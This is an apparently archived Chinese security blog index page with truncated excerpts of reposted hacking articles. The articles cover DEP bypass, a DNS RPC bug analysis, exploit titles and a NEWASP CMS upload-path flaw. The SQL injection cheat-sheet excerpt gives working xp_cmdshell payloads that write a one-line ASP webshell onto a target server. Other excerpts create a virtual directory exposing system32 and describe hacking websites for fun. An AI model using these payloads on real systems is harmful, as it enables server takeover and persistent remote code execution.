0pera 9.2 torrent file remote dos exploit

来源:Security vulnerabilities

阅读全文 »

Tags: ,

Bypass Hardware DEP Tips

Author: axis
Date: 2007-04-27
http://www.ph4nt0m.org

DEP(数据执行保护),是windows针对溢出的一种保护措施,分软dep和硬dep,其中硬dep是需要cpu支持的,比较新的处理器一般都支持这个选项,可以在bios里去打开。简单来说,就是堆栈不可执行了,所以一般的在堆栈里执行shellcode的exploit,会攻击失败。

bypass dep也不是新东西了,目前最好的一篇文档是skape和skywing发在uninformed上的一篇。
http://www.uninformed.org/?v=2&a=4&t=txt

这篇文档写的很好,任何想学习或者研究bypass dep的人,都应该去仔细阅读这份文档。

这次由于metasploit里的dns 阅读全文 »

最详细的SQL注入相关的命令整理

鬼仔注:一样老文,存档。其实文中很多东西以前都曾经发过,不过这个是总结性的。发一下,方便我自己,也方便大家查阅。

来源:H4x0r's Blog

1、 用^转义字符来写ASP(一句话木马)文件的方法:
? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';–

? echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2、 显示SQL系统版本:
? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
阅读全文 »

Tags: ,

SQL注入建立虚拟目录

鬼仔注:老文,刚才发 上篇 文章的时候想起来这篇文章,以前没发过,保存一下。

来源:H4x0r's Blog

我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虚拟目录win,指向c:\winnt\system32
阅读全文 »

Tags: ,

web 和 数据分离

鬼仔注:以前有过类似的文章,在 这篇文章 的尾部有猪三以前写的“注射过程中DB_ONER权限并且主机与数据库不在一起的搞法”。

来源:混世魔王 de BLOG
web 和 数据分离,有Pcanywhere,数据库服务器有 IIS,
cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings 得到第一个Web服务的端口
cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir创建一个虚拟目录wodexi
阅读全文 »

NEWASP 新云CMS BUG

鬼仔注:刚在H4x0r那里看到的,很简单的英文,不会英文的,根据里面几个URL和关键字也应该能看出来什么意思,必须要求IIS 6.0,跟前段时间动易那个一样,利用Windows 2003 Enterprise Edition IIS6 .ASP目录执行缺陷。不过新云的这个好像需要用NC提交,以达到修改上传路径的目的。

来源:H4x0r's Blog

HACK..
JUST,DO.IT!
I LOVE HACKED DOWN WEBSITE. HOHO~~~~~

This is BUG Only For > IIS 6.0 (Windows 2003 )

EXPLIOT:

HTTP://WWW.****.COM/(UPLOAD.ASP)

You can change upload is filepath…. -_-!!
阅读全文 »

Tags:

IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2

鬼仔注:前段时间还发过 这个

来源:milw0rm

阅读全文 »

Tags: ,

DNS RPC 分析

Author: 云舒
Date: 2007-04-27
http://www.ph4nt0m.org

根据安全公告的漏洞描述,漏洞发生在dns.exe程序中的DnssrvQuery函数,这个函数是一个RPC函数,允许客户端进行远程调用。先用IDA对

dns.exe进行静态的反汇编分析,找到如下调用关系:

找到地址010154EC处,看到代码如下:
阅读全文 »

Tags: ,